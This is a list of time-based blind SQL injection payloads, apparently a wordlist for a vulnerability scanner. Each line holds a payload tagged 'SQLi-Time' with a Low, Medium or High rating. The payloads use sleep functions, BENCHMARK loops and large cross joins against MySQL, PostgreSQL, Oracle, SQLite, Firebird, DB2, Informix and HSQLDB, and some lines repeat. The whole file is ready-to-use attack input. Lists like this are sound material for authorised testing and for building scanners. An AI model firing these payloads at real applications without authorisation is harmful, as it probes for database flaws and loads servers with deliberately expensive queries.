AND 1=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)||SQLi-Time||High
AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))||SQLi-Time||Medium
OR 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))||SQLi-Time||High
AND 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))||SQLi-Time||Medium
OR 1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)||SQLi-Time||High
AND 'vun'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1),0),5000000000),NULL)||SQLi-Time||Medium
OR 'vun'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1),0),5000000000),NULL)||SQLi-Time||High
AND 'vun'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1),0),5000000000),NULL)||SQLi-Time||Medium
OR 'vun'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1),0),5000000000),NULL)||SQLi-Time||High
AND 'vun'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),500000000),NULL)||SQLi-Time||Medium
OR 'vun'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),500000000),NULL)||SQLi-Time||High
AND 'vun'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),500000000),NULL)||SQLi-Time||Medium
OR 'vun'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),500000000),NULL)||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)||SQLi-Time||High
AND 1=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)||SQLi-Time||Medium
OR 1=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)||SQLi-Time||High
AND 1=(SELECT COUNT(fuzzBits('vun', 0.001)) FROM numbers(1000000))||SQLi-Time||Low
OR 1=(SELECT COUNT(fuzzBits('vun', 0.001)) FROM numbers(1000000))||SQLi-Time||High
PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('\',(BENCHMARK(5000000,MD5('vun'))))),1)||SQLi-Time||Medium
PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('\',(BENCHMARK(5000000,MD5('vun'))))),1)||SQLi-Time||Medium
(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)||SQLi-Time||Low
(SELECT 1 FROM (SELECT(SLEEP(5)))vun)||SQLi-Time||Low
(CASE WHEN (1=1) THEN (SELECT BENCHMARK(5000000,MD5('vun'))) ELSE 1)||SQLi-Time||Medium
(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)||SQLi-Time||Medium
(1=1 AND SLEEP(5))||SQLi-Time||Low
ELT(1=1,SLEEP(5))||SQLi-Time||Low
MAKE_SET(1=1,SLEEP(5))||SQLi-Time||Low
(SELECT 1 FROM PG_SLEEP(5))||SQLi-Time||Low
(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000))||SQLi-Time||Medium
(SELECT (CASE WHEN (1=1) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1 END))||SQLi-Time||Medium
BEGIN IF (1=1) THEN DBMS_LOCK.SLEEP(5); ELSE DBMS_LOCK.SLEEP(0); END IF; END;||SQLi-Time||Low
(SELECT (CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('vun',5) ELSE 1 END) FROM DUAL)||SQLi-Time||Low
(SELECT (CASE WHEN (1=1) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1 END) FROM DUAL)||SQLi-Time||Medium
(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))))||SQLi-Time||Medium
(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)||SQLi-Time||Medium
(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)||SQLi-Time||Medium
(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)||SQLi-Time||Medium
(SELECT (CASE WHEN (1=1) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1),0),500000000),NULL) ELSE 'vun' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)||SQLi-Time||Medium
(SELECT (CASE WHEN (1=1) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),500000000),NULL) ELSE 'vun' END) FROM (VALUES(0)))||SQLi-Time||Medium
(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)||SQLi-Time||Medium
,(SELECT (CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END))||SQLi-Time||Low
,(SELECT (CASE WHEN (1=1) THEN (SELECT BENCHMARK(5000000,MD5('vun'))) ELSE 1*(SELECT 1 FROM mysql.db) END))||SQLi-Time||Medium
,(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(5)) ELSE 1/(SELECT 0) END))||SQLi-Time||Low
,(SELECT (CASE WHEN (1=1) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) ELSE 1/(SELECT 0) END))||SQLi-Time||Medium
,(SELECT (CASE WHEN (1=1) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1*(SELECT 1 UNION ALL SELECT 1) END))||SQLi-Time||Medium
,(BEGIN IF (1=1) THEN DBMS_LOCK.SLEEP(5); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)||SQLi-Time||Low
,(SELECT (CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('vun',5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)||SQLi-Time||Low
,(SELECT (CASE WHEN (1=1) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)||SQLi-Time||Medium
,(SELECT (CASE WHEN (1=1) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(1),0),500000000),NULL))) ELSE 1/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)||SQLi-Time||Medium
,(SELECT (CASE WHEN (1=1) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),500000000),NULL))) ELSE 1/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))||SQLi-Time||Medium
